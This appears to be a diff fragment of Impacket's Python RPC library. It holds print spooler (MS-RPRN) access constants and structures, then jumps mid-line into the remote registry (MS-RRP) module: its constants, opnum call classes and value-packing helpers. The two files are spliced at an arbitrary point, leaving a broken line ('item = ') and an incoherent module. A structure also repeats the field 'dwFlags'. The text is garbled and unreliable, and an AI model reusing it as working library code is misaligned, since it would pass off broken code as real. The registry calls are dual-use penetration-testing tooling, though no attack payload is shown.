+JOB_EXECUTE = 0x00020010
+JOB_READ = 0x00020020
+JOB_WRITE = 0x00020010
+JOB_ALL_ACCESS = 0x000F0030
+PRINTER_ACCESS_ADMINISTER = 0x00000004
+PRINTER_ACCESS_USE = 0x00000008
+PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
+PRINTER_ALL_ACCESS = 0x000F000C
+PRINTER_EXECUTE = 0x00020008
+PRINTER_READ = 0x00020008
+PRINTER_WRITE = 0x00020008
+SERVER_ACCESS_ADMINISTER = 0x00000001
+SERVER_ACCESS_ENUMERATE = 0x00000002
+SERVER_ALL_ACCESS = 0x000F0003
+SERVER_EXECUTE = 0x00020002
+SERVER_READ = 0x00020002
+SERVER_WRITE = 0x00020003
+SPECIFIC_RIGHTS_ALL = 0x0000FFFF
+STANDARD_RIGHTS_ALL = 0x001F0000
+STANDARD_RIGHTS_EXECUTE = 0x00020000
+STANDARD_RIGHTS_READ = 0x00020000
+STANDARD_RIGHTS_REQUIRED = 0x000F0000
+STANDARD_RIGHTS_WRITE = 0x00020000
+SYNCHRONIZE = 0x00100000
+DELETE = 0x00010000
+READ_CONTROL = 0x00020000
+WRITE_DAC = 0x00040000
+WRITE_OWNER = 0x00080000
+GENERIC_READ = 0x80000000
+GENERIC_WRITE = 0x40000000
+GENERIC_EXECUTE = 0x20000000
+GENERIC_ALL = 0x10000000
+
+# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
+PRINTER_CHANGE_SET_PRINTER = 0x00000002
+PRINTER_CHANGE_DELETE_PRINTER = 0x00000004
+PRINTER_CHANGE_PRINTER = 0x000000FF
+PRINTER_CHANGE_ADD_JOB = 0x00000100
+PRINTER_CHANGE_SET_JOB = 0x00000200
+PRINTER_CHANGE_DELETE_JOB = 0x00000400
+PRINTER_CHANGE_WRITE_JOB = 0x00000800
+PRINTER_CHANGE_JOB = 0x0000FF00
+PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
+PRINTER_CHANGE_TIMEOUT = 0x80000000
+PRINTER_CHANGE_ALL = 0x7777FFFF
+PRINTER_CHANGE_ALL_2 = 0x7F77FFFF
+
+# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
+PRINTER_CHANGE_ADD_PRINTER_DRIVER = 0x10000000
+PRINTER_CHANGE_DELETE_PRINTER_DRIVER = 0x40000000
+PRINTER_CHANGE_PRINTER_DRIVER = 0x70000000
+PRINTER_CHANGE_ADD_FORM = 0x00010000
+PRINTER_CHANGE_DELETE_FORM = 0x00040000
+PRINTER_CHANGE_SET_FORM = 0x00020000
+PRINTER_CHANGE_FORM = 0x00070000
+PRINTER_CHANGE_ADD_PORT = 0x00100000
+PRINTER_CHANGE_CONFIGURE_PORT = 0x00200000
+PRINTER_CHANGE_DELETE_PORT = 0x00400000
+PRINTER_CHANGE_PORT = 0x00700000
+PRINTER_CHANGE_ADD_PRINT_PROCESSOR = 0x01000000
+PRINTER_CHANGE_DELETE_PRINT_PROCESSOR = 0x04000000
+PRINTER_CHANGE_PRINT_PROCESSOR = 0x07000000
+PRINTER_CHANGE_ADD_PRINTER = 0x00000001
+PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
+PRINTER_CHANGE_SERVER = 0x08000000
+
+# 2.2.3.7 Printer Enumeration Flags
+PRINTER_ENUM_LOCAL = 0x00000002
+PRINTER_ENUM_CONNECTIONS = 0x00000004
+PRINTER_ENUM_NAME = 0x00000008
+PRINTER_ENUM_REMOTE = 0x00000010
+PRINTER_ENUM_SHARED = 0x00000020
+PRINTER_ENUM_NETWORK = 0x00000040
+PRINTER_ENUM_EXPAND = 0x00004000
+PRINTER_ENUM_CONTAINER = 0x00008000
+PRINTER_ENUM_ICON1 = 0x00010000
+PRINTER_ENUM_ICON2 = 0x00020000
+PRINTER_ENUM_ICON3 = 0x00040000
+PRINTER_ENUM_ICON8 = 0x00800000
+PRINTER_ENUM_HIDE = 0x01000000
+
+
+# 2.2.3.8 Printer Notification Values
+PRINTER_NOTIFY_CATEGORY_2D = 0x00000000
+PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
+PRINTER_NOTIFY_CATEGORY_3D = 0x00020000
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1.1.4 PRINTER_HANDLE
+class PRINTER_HANDLE(NDRSTRUCT):
+ structure = (
+ ('Data','20s=b""'),
+ )
+ def getAlignment(self):
+ if self._isNDR64 is True:
+ return 8
+ else:
+ return 4
+
+# 2.2.1.2.1 DEVMODE_CONTAINER
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', BYTE_ARRAY),
+ )
+
+class DEVMODE_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('cbBuf',DWORD),
+ ('pDevMode',PBYTE_ARRAY),
+ )
+
+# 2.2.1.11.1 SPLCLIENT_INFO_1
+class SPLCLIENT_INFO_1(NDRSTRUCT):
+ structure = (
+ ('dwSize',DWORD),
+ ('pMachineName',LPWSTR),
+ ('pUserName',LPWSTR),
+ ('dwBuildNum',DWORD),
+ ('dwMajorVersion',DWORD),
+ ('dwMinorVersion',DWORD),
+ ('wProcessorArchitecture',USHORT),
+ )
+
+class PSPLCLIENT_INFO_1(NDRPOINTER):
+ referent = (
+ ('Data', SPLCLIENT_INFO_1),
+ )
+
+# 2.2.1.11.2 SPLCLIENT_INFO_2
+class SPLCLIENT_INFO_2(NDRSTRUCT):
+ structure = (
+ ('notUsed',ULONGLONG),
+ )
+
+class PSPLCLIENT_INFO_2(NDRPOINTER):
+ referent = (
+ ('Data', SPLCLIENT_INFO_2),
+ )
+# 2.2.1.11.3 SPLCLIENT_INFO_3
+class SPLCLIENT_INFO_3(NDRSTRUCT):
+ structure = (
+ ('cbSize',UINT),
+ ('dwFlags',DWORD),
+ ('dwFlags',DWORD),
+ ('pMachineName',LPWSTR),
+ ('pUserName',LPWSTR),
+ ('dwBuildNum',DWORD),
+ ('dwMajorVersion',DWORD),
+ ('dwMinorVersion',DWORD),
+ ('wProcessorArchitecture',USHORT),
+ ('hSplPrinter',ULONGLONG),
+ )
+
+class PSPLCLIENT_INFO_3(NDRPOINTER):
+ referent = (
+ ('Data', SPLCLIENT_INFO_3),
+ )
+# 2.2.1.2.14 SPLCLIENT_CONTAINER
+class CLIENT_INFO_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+ union = {
+ 1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
+ 2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
+ 3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
+ }
+
+class SPLCLIENT_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('Level',DWORD),
+ ('ClientInfo',CLIENT_INFO_UNION),
+ )
+
+
+# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
+class USHORT_ARRAY(NDRUniConformantArray):
+ item = '.
+# There are test cases for them too.
+#
+
+
+from struct import unpack, pack
+
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantVaryingArray, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, UUID, ULONG, LPULONG, BOOLEAN, SECURITY_INFORMATION, PFILETIME, \
+ RPC_UNICODE_STRING, FILETIME, NULL, MAXIMUM_ALLOWED, OWNER_SECURITY_INFORMATION, PWCHAR, PRPC_UNICODE_STRING
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors, LOG
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_RRP = uuidtup_to_bin(('338CD001-2244-31F1-AAAA-900038001003', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'RRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'RRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 PREGISTRY_SERVER_NAME
+PREGISTRY_SERVER_NAME = PWCHAR
+
+# 2.2.3 error_status_t
+error_status_t = ULONG
+
+# 2.2.5 RRP_UNICODE_STRING
+RRP_UNICODE_STRING = RPC_UNICODE_STRING
+PRRP_UNICODE_STRING = PRPC_UNICODE_STRING
+
+# 2.2.4 REGSAM
+REGSAM = ULONG
+
+KEY_QUERY_VALUE = 0x00000001
+KEY_SET_VALUE = 0x00000002
+KEY_CREATE_SUB_KEY = 0x00000004
+KEY_ENUMERATE_SUB_KEYS = 0x00000008
+KEY_CREATE_LINK = 0x00000020
+KEY_WOW64_64KEY = 0x00000100
+KEY_WOW64_32KEY = 0x00000200
+
+REG_BINARY = 3
+REG_DWORD = 4
+REG_DWORD_LITTLE_ENDIAN = 4
+REG_DWORD_BIG_ENDIAN = 5
+REG_EXPAND_SZ = 2
+REG_LINK = 6
+REG_MULTI_SZ = 7
+REG_NONE = 0
+REG_QWORD = 11
+REG_QWORD_LITTLE_ENDIAN = 11
+REG_SZ = 1
+
+# 3.1.5.7 BaseRegCreateKey (Opnum 6)
+REG_CREATED_NEW_KEY = 0x00000001
+REG_OPENED_EXISTING_KEY = 0x00000002
+
+# 3.1.5.19 BaseRegRestoreKey (Opnum 19)
+# Flags
+REG_WHOLE_HIVE_VOLATILE = 0x00000001
+REG_REFRESH_HIVE = 0x00000002
+REG_NO_LAZY_FLUSH = 0x00000004
+REG_FORCE_RESTORE = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1 RPC_HKEY
+class RPC_HKEY(NDRSTRUCT):
+ structure = (
+ ('context_handle_attributes',ULONG),
+ ('context_handle_uuid',UUID),
+ )
+
+ def __init__(self, data=None, isNDR64=False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ self['context_handle_uuid'] = b'\x00'*16
+
+ def isNull(self):
+ return self['context_handle_uuid'] == b'\x00'*16
+
+# 2.2.6 RVALENT
+class RVALENT(NDRSTRUCT):
+ structure = (
+ ('ve_valuename',PRRP_UNICODE_STRING),
+ ('ve_valuelen',DWORD),
+ ('ve_valueptr',DWORD),
+ ('ve_type',DWORD),
+ )
+
+class RVALENT_ARRAY(NDRUniConformantVaryingArray):
+ item = RVALENT
+
+# 2.2.9 RPC_SECURITY_DESCRIPTOR
+class BYTE_ARRAY(NDRUniConformantVaryingArray):
+ pass
+
+class PBYTE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', BYTE_ARRAY),
+ )
+
+class RPC_SECURITY_DESCRIPTOR(NDRSTRUCT):
+ structure = (
+ ('lpSecurityDescriptor',PBYTE_ARRAY),
+ ('cbInSecurityDescriptor',DWORD),
+ ('cbOutSecurityDescriptor',DWORD),
+ )
+
+# 2.2.8 RPC_SECURITY_ATTRIBUTES
+class RPC_SECURITY_ATTRIBUTES(NDRSTRUCT):
+ structure = (
+ ('nLength',DWORD),
+ ('RpcSecurityDescriptor',RPC_SECURITY_DESCRIPTOR),
+ ('bInheritHandle',BOOLEAN),
+ )
+
+class PRPC_SECURITY_ATTRIBUTES(NDRPOINTER):
+ referent = (
+ ('Data', RPC_SECURITY_ATTRIBUTES),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.5.1 OpenClassesRoot (Opnum 0)
+class OpenClassesRoot(NDRCALL):
+ opnum = 0
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenClassesRootResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.2 OpenCurrentUser (Opnum 1)
+class OpenCurrentUser(NDRCALL):
+ opnum = 1
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenCurrentUserResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.3 OpenLocalMachine (Opnum 2)
+class OpenLocalMachine(NDRCALL):
+ opnum = 2
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenLocalMachineResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.4 OpenPerformanceData (Opnum 3)
+class OpenPerformanceData(NDRCALL):
+ opnum = 3
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenPerformanceDataResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.5 OpenUsers (Opnum 4)
+class OpenUsers(NDRCALL):
+ opnum = 4
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenUsersResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.6 BaseRegCloseKey (Opnum 5)
+class BaseRegCloseKey(NDRCALL):
+ opnum = 5
+ structure = (
+ ('hKey', RPC_HKEY),
+ )
+
+class BaseRegCloseKeyResponse(NDRCALL):
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.7 BaseRegCreateKey (Opnum 6)
+class BaseRegCreateKey(NDRCALL):
+ opnum = 6
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ ('lpClass', RRP_UNICODE_STRING),
+ ('dwOptions', DWORD),
+ ('samDesired', REGSAM),
+ ('lpSecurityAttributes', PRPC_SECURITY_ATTRIBUTES),
+ ('lpdwDisposition', LPULONG),
+ )
+
+class BaseRegCreateKeyResponse(NDRCALL):
+ structure = (
+ ('phkResult', RPC_HKEY),
+ ('lpdwDisposition', LPULONG),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.8 BaseRegDeleteKey (Opnum 7)
+class BaseRegDeleteKey(NDRCALL):
+ opnum = 7
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ )
+
+class BaseRegDeleteKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.9 BaseRegDeleteValue (Opnum 8)
+class BaseRegDeleteValue(NDRCALL):
+ opnum = 8
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpValueName', RRP_UNICODE_STRING),
+ )
+
+class BaseRegDeleteValueResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.10 BaseRegEnumKey (Opnum 9)
+class BaseRegEnumKey(NDRCALL):
+ opnum = 9
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('dwIndex', DWORD),
+ ('lpNameIn', RRP_UNICODE_STRING),
+ ('lpClassIn', PRRP_UNICODE_STRING),
+ ('lpftLastWriteTime', PFILETIME),
+ )
+
+class BaseRegEnumKeyResponse(NDRCALL):
+ structure = (
+ ('lpNameOut', RRP_UNICODE_STRING),
+ ('lplpClassOut', PRRP_UNICODE_STRING),
+ ('lpftLastWriteTime', PFILETIME),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.11 BaseRegEnumValue (Opnum 10)
+class BaseRegEnumValue(NDRCALL):
+ opnum = 10
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('dwIndex', DWORD),
+ ('lpValueNameIn', RRP_UNICODE_STRING),
+ ('lpType', LPULONG),
+ ('lpData', PBYTE_ARRAY),
+ ('lpcbData', LPULONG),
+ ('lpcbLen', LPULONG),
+ )
+
+class BaseRegEnumValueResponse(NDRCALL):
+ structure = (
+ ('lpValueNameOut', RRP_UNICODE_STRING),
+ ('lpType', LPULONG),
+ ('lpData', PBYTE_ARRAY),
+ ('lpcbData', LPULONG),
+ ('lpcbLen', LPULONG),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.12 BaseRegFlushKey (Opnum 11)
+class BaseRegFlushKey(NDRCALL):
+ opnum = 11
+ structure = (
+ ('hKey', RPC_HKEY),
+ )
+
+class BaseRegFlushKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.13 BaseRegGetKeySecurity (Opnum 12)
+class BaseRegGetKeySecurity(NDRCALL):
+ opnum = 12
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('SecurityInformation', SECURITY_INFORMATION),
+ ('pRpcSecurityDescriptorIn', RPC_SECURITY_DESCRIPTOR),
+ )
+
+class BaseRegGetKeySecurityResponse(NDRCALL):
+ structure = (
+ ('pRpcSecurityDescriptorOut', RPC_SECURITY_DESCRIPTOR),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.14 BaseRegLoadKey (Opnum 13)
+class BaseRegLoadKey(NDRCALL):
+ opnum = 13
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ ('lpFile', RRP_UNICODE_STRING),
+ )
+
+class BaseRegLoadKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.15 BaseRegOpenKey (Opnum 15)
+class BaseRegOpenKey(NDRCALL):
+ opnum = 15
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ ('dwOptions', DWORD),
+ ('samDesired', REGSAM),
+ )
+
+class BaseRegOpenKeyResponse(NDRCALL):
+ structure = (
+ ('phkResult', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.16 BaseRegQueryInfoKey (Opnum 16)
+class BaseRegQueryInfoKey(NDRCALL):
+ opnum = 16
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpClassIn', RRP_UNICODE_STRING),
+ )
+
+class BaseRegQueryInfoKeyResponse(NDRCALL):
+ structure = (
+ ('lpClassOut', RPC_UNICODE_STRING),
+ ('lpcSubKeys', DWORD),
+ ('lpcbMaxSubKeyLen', DWORD),
+ ('lpcbMaxClassLen', DWORD),
+ ('lpcValues', DWORD),
+ ('lpcbMaxValueNameLen', DWORD),
+ ('lpcbMaxValueLen', DWORD),
+ ('lpcbSecurityDescriptor', DWORD),
+ ('lpftLastWriteTime', FILETIME),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.17 BaseRegQueryValue (Opnum 17)
+class BaseRegQueryValue(NDRCALL):
+ opnum = 17
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpValueName', RRP_UNICODE_STRING),
+ ('lpType', LPULONG),
+ ('lpData', PBYTE_ARRAY),
+ ('lpcbData', LPULONG),
+ ('lpcbLen', LPULONG),
+ )
+
+class BaseRegQueryValueResponse(NDRCALL):
+ structure = (
+ ('lpType', LPULONG),
+ ('lpData', PBYTE_ARRAY),
+ ('lpcbData', LPULONG),
+ ('lpcbLen', LPULONG),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.18 BaseRegReplaceKey (Opnum 18)
+class BaseRegReplaceKey(NDRCALL):
+ opnum = 18
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ ('lpNewFile', RRP_UNICODE_STRING),
+ ('lpOldFile', RRP_UNICODE_STRING),
+ )
+
+class BaseRegReplaceKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.19 BaseRegRestoreKey (Opnum 19)
+class BaseRegRestoreKey(NDRCALL):
+ opnum = 19
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpFile', RRP_UNICODE_STRING),
+ ('Flags', DWORD),
+ )
+
+class BaseRegRestoreKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.20 BaseRegSaveKey (Opnum 20)
+class BaseRegSaveKey(NDRCALL):
+ opnum = 20
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpFile', RRP_UNICODE_STRING),
+ ('pSecurityAttributes', PRPC_SECURITY_ATTRIBUTES),
+ )
+
+class BaseRegSaveKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.21 BaseRegSetKeySecurity (Opnum 21)
+class BaseRegSetKeySecurity(NDRCALL):
+ opnum = 21
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('SecurityInformation', SECURITY_INFORMATION),
+ ('pRpcSecurityDescriptor', RPC_SECURITY_DESCRIPTOR),
+ )
+
+class BaseRegSetKeySecurityResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.22 BaseRegSetValue (Opnum 22)
+class BaseRegSetValue(NDRCALL):
+ opnum = 22
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpValueName', RRP_UNICODE_STRING),
+ ('dwType', DWORD),
+ ('lpData', NDRUniConformantArray),
+ ('cbData', DWORD),
+ )
+
+class BaseRegSetValueResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.23 BaseRegUnLoadKey (Opnum 23)
+class BaseRegUnLoadKey(NDRCALL):
+ opnum = 23
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ )
+
+class BaseRegUnLoadKeyResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.24 BaseRegGetVersion (Opnum 26)
+class BaseRegGetVersion(NDRCALL):
+ opnum = 26
+ structure = (
+ ('hKey', RPC_HKEY),
+ )
+
+class BaseRegGetVersionResponse(NDRCALL):
+ structure = (
+ ('lpdwVersion', DWORD),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.25 OpenCurrentConfig (Opnum 27)
+class OpenCurrentConfig(NDRCALL):
+ opnum = 27
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenCurrentConfigResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.26 BaseRegQueryMultipleValues (Opnum 29)
+class BaseRegQueryMultipleValues(NDRCALL):
+ opnum = 29
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('val_listIn', RVALENT_ARRAY),
+ ('num_vals', DWORD),
+ ('lpvalueBuf', PBYTE_ARRAY),
+ ('ldwTotsize', DWORD),
+ )
+
+class BaseRegQueryMultipleValuesResponse(NDRCALL):
+ structure = (
+ ('val_listOut', RVALENT_ARRAY),
+ ('lpvalueBuf', PBYTE_ARRAY),
+ ('ldwTotsize', DWORD),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.27 BaseRegSaveKeyEx (Opnum 31)
+class BaseRegSaveKeyEx(NDRCALL):
+ opnum = 31
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpFile', RRP_UNICODE_STRING),
+ ('pSecurityAttributes', PRPC_SECURITY_ATTRIBUTES),
+ ('Flags', DWORD),
+ )
+
+class BaseRegSaveKeyExResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.28 OpenPerformanceText (Opnum 32)
+class OpenPerformanceText(NDRCALL):
+ opnum = 32
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenPerformanceTextResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.29 OpenPerformanceNlsText (Opnum 33)
+class OpenPerformanceNlsText(NDRCALL):
+ opnum = 33
+ structure = (
+ ('ServerName', PREGISTRY_SERVER_NAME),
+ ('samDesired', REGSAM),
+ )
+
+class OpenPerformanceNlsTextResponse(NDRCALL):
+ structure = (
+ ('phKey', RPC_HKEY),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.30 BaseRegQueryMultipleValues2 (Opnum 34)
+class BaseRegQueryMultipleValues2(NDRCALL):
+ opnum = 34
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('val_listIn', RVALENT_ARRAY),
+ ('num_vals', DWORD),
+ ('lpvalueBuf', PBYTE_ARRAY),
+ ('ldwTotsize', DWORD),
+ )
+
+class BaseRegQueryMultipleValues2Response(NDRCALL):
+ structure = (
+ ('val_listOut', RVALENT_ARRAY),
+ ('lpvalueBuf', PBYTE_ARRAY),
+ ('ldwRequiredSize', DWORD),
+ ('ErrorCode', error_status_t),
+ )
+
+# 3.1.5.31 BaseRegDeleteKeyEx (Opnum 35)
+class BaseRegDeleteKeyEx(NDRCALL):
+ opnum = 35
+ structure = (
+ ('hKey', RPC_HKEY),
+ ('lpSubKey', RRP_UNICODE_STRING),
+ ('AccessMask', REGSAM),
+ ('Reserved', DWORD),
+ )
+
+class BaseRegDeleteKeyExResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', error_status_t),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (OpenClassesRoot, OpenClassesRootResponse),
+ 1 : (OpenCurrentUser, OpenCurrentUserResponse),
+ 2 : (OpenLocalMachine, OpenLocalMachineResponse),
+ 3 : (OpenPerformanceData, OpenPerformanceDataResponse),
+ 4 : (OpenUsers, OpenUsersResponse),
+ 5 : (BaseRegCloseKey, BaseRegCloseKeyResponse),
+ 6 : (BaseRegCreateKey, BaseRegCreateKeyResponse),
+ 7 : (BaseRegDeleteKey, BaseRegDeleteKeyResponse),
+ 8 : (BaseRegDeleteValue, BaseRegDeleteValueResponse),
+ 9 : (BaseRegEnumKey, BaseRegEnumKeyResponse),
+10 : (BaseRegEnumValue, BaseRegEnumValueResponse),
+11 : (BaseRegFlushKey, BaseRegFlushKeyResponse),
+12 : (BaseRegGetKeySecurity, BaseRegGetKeySecurityResponse),
+13 : (BaseRegLoadKey, BaseRegLoadKeyResponse),
+15 : (BaseRegOpenKey, BaseRegOpenKeyResponse),
+16 : (BaseRegQueryInfoKey, BaseRegQueryInfoKeyResponse),
+17 : (BaseRegQueryValue, BaseRegQueryValueResponse),
+18 : (BaseRegReplaceKey, BaseRegReplaceKeyResponse),
+19 : (BaseRegRestoreKey, BaseRegRestoreKeyResponse),
+20 : (BaseRegSaveKey, BaseRegSaveKeyResponse),
+21 : (BaseRegSetKeySecurity, BaseRegSetKeySecurityResponse),
+22 : (BaseRegSetValue, BaseRegSetValueResponse),
+23 : (BaseRegUnLoadKey, BaseRegUnLoadKeyResponse),
+26 : (BaseRegGetVersion, BaseRegGetVersionResponse),
+27 : (OpenCurrentConfig, OpenCurrentConfigResponse),
+29 : (BaseRegQueryMultipleValues, BaseRegQueryMultipleValuesResponse),
+31 : (BaseRegSaveKeyEx, BaseRegSaveKeyExResponse),
+32 : (OpenPerformanceText, OpenPerformanceTextResponse),
+33 : (OpenPerformanceNlsText, OpenPerformanceNlsTextResponse),
+34 : (BaseRegQueryMultipleValues2, BaseRegQueryMultipleValues2Response),
+35 : (BaseRegDeleteKeyEx, BaseRegDeleteKeyExResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+def packValue(valueType, value):
+ if valueType == REG_DWORD:
+ retData = pack('L', value)
+ elif valueType == REG_EXPAND_SZ:
+ try:
+ retData = value.encode('utf-16le')
+ except UnicodeDecodeError:
+ import sys
+ retData = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+ elif valueType == REG_MULTI_SZ:
+ try:
+ retData = value.encode('utf-16le')
+ except UnicodeDecodeError:
+ import sys
+ retData = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+ elif valueType == REG_QWORD:
+ retData = pack('Q', value)
+ elif valueType == REG_SZ:
+ try:
+ retData = value.encode('utf-16le')
+ except UnicodeDecodeError:
+ import sys
+ retData = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+ else:
+ retData = value
+
+ return retData
+
+def unpackValue(valueType, value):
+ if valueType == REG_DWORD:
+ retData = unpack('L', b''.join(value))[0]
+ elif valueType == REG_EXPAND_SZ:
+ retData = b''.join(value).decode('utf-16le')
+ elif valueType == REG_MULTI_SZ:
+ retData = b''.join(value).decode('utf-16le')
+ elif valueType == REG_QWORD:
+ retData = unpack('Q', b''.join(value))[0]
+ elif valueType == REG_SZ:
+ retData = b''.join(value).decode('utf-16le')
+ else:
+ retData = b''.join(value)
+
+ return retData
+
+def hOpenClassesRoot(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenClassesRoot()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hOpenCurrentUser(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenCurrentUser()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hOpenLocalMachine(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenLocalMachine()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hOpenPerformanceData(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenPerformanceData()
+ request['ServerName'] = NULL
